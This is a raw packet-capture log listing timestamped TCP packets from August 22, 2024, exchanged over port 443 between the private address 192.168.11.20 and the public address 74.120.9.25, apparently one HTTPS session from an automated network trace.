Aug 22, 2024 16:13:37.590358973 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.590368986 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.590552092 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.600750923 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.601002932 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.601073027 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.601273060 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.611149073 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.611320972 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.611320972 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.611392021 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.616750002 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.616964102 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.624891043 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.625030041 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.625077009 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.625092030 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.625287056 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.633021116 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.633236885 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.633342981 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.642785072 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.643141985 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.643160105 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.643306971 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.651443958 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.652168036 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.652189970 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.652487040 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.661998987 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.662221909 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.662236929 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.662552118 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.667668104 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.668344975 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.668361902 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.668600082 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.675199986 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.675576925 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.675879002 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.675890923 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.676171064 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.685034990 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.685296059 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.693065882 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.693228006 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.693228006 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.693245888 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.693442106 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.702162027 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.702322960 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.702322960 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.702487946 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.707341909 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.707509041 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.718712091 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.718929052 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.718941927 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.719115973 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.726955891 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.727282047 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.727293968 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.727493048 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.737212896 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.737407923 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.737407923 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.737425089 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.737574100 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.747531891 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.747711897 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.755471945 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.755661964 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.755661964 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.755677938 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.755856037 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.768476009 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.768728971 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.768740892 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.768920898 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.775091887 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.775259018 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.775424004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.775430918 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.775589943 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.784636974 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.784775019 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.784822941 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.789174080 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.789371967 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.798261881 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.798465967 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.798465967 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.798480988 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.798677921 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.805993080 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.806266069 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.809289932 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.809700012 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.812014103 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.812166929 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.820239067 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.820388079 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.820553064 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.820560932 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.820769072 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.828732967 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.828955889 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.829024076 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.829034090 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.829221010 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.837876081 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.838011026 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.838100910 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.838109016 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.838267088 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.844713926 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.844928026 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.845001936 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.851385117 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.851569891 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.856218100 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.856431961 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.856501102 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.863212109 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.863373995 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.863421917 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.867273092 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.867497921 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.873610020 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.873775959 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.873775959 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.873792887 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.873989105 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.885030031 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.885201931 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.885201931 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.891259909 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.891465902 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.901299953 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.901464939 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.901693106 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.901700974 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.901905060 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.909322023 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.909545898 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.909559965 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.909761906 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.914263964 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.914522886 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.922872066 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.923072100 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.923162937 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.923171043 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.923418045 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.930018902 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.930229902 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.930273056 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.930280924 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.930488110 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.940377951 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.940603018 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.942347050 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.942507029 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.950547934 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.950910091 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.951008081 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.951019049 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.951215982 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.958656073 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.958882093 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.958894014 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.959095955 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.966872931 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.967132092 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.967132092 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.970999002 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.971272945 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.971272945 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.971287966 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.971483946 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.983256102 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.983418941 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.983418941 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.983433962 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.983632088 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.987921000 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.988137007 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.988148928 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.988302946 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.996885061 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.997214079 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.997214079 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:37.997230053 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:37.997425079 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.004151106 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.004323006 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.004370928 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.009988070 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.010122061 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.017529964 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.017791033 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.017791033 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.027982950 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.028153896 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.028275967 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.030867100 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.031013012 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.040735960 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.040930986 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.040946960 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.041136980 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.048238039 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.048451900 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.048469067 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.048718929 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.056055069 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.056261063 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.056277990 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.056502104 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.064178944 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.064531088 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.065948009 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.066139936 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.071145058 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.071408987 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.078653097 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.078913927 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.082516909 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.082715988 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.086780071 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.086941004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.087155104 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.087169886 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.087342024 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.095011950 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.095174074 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.095237970 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.099225044 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.099436045 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.103219032 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.103488922 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.107266903 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.107548952 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.114722967 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.114892006 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.114962101 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.114976883 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.115170956 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.118733883 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.119043112 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.126600027 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.126849890 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.126867056 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.127216101 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.134562016 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.134763956 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.134780884 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.134985924 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.142230034 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.142411947 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.142576933 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.142586946 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.142824888 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.146492004 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.146708965 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.146708965 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.153701067 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.154006958 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.164288998 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.164422035 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.164422035 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.164634943 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.164644957 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.164863110 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.174005985 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.174266100 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.174266100 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.179595947 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.179796934 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.179816961 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.179827929 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.179979086 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.185174942 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.185326099 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.185326099 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.185374022 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.188313007 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.188461065 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.196511984 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.196708918 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.196710110 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.196729898 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.196904898 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.202647924 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.202807903 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.203027964 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.203041077 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.203227043 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.212766886 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.212996006 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.213066101 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.213079929 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.213227034 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.218899012 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.219034910 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.219083071 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.227054119 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.228010893 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.228029966 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.228233099 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.235415936 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.236255884 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.236275911 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.236507893 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.243611097 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.243756056 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.243807077 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.243828058 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.244074106 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.251460075 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.251662016 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.251718998 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.252986908 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.253216982 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.260334015 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.260554075 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.260718107 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.260740042 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.260895967 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.264101982 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.264314890 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:38.275433064 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:38.275696993 CEST	49794	443	192.168.11.20	74.120.9.25
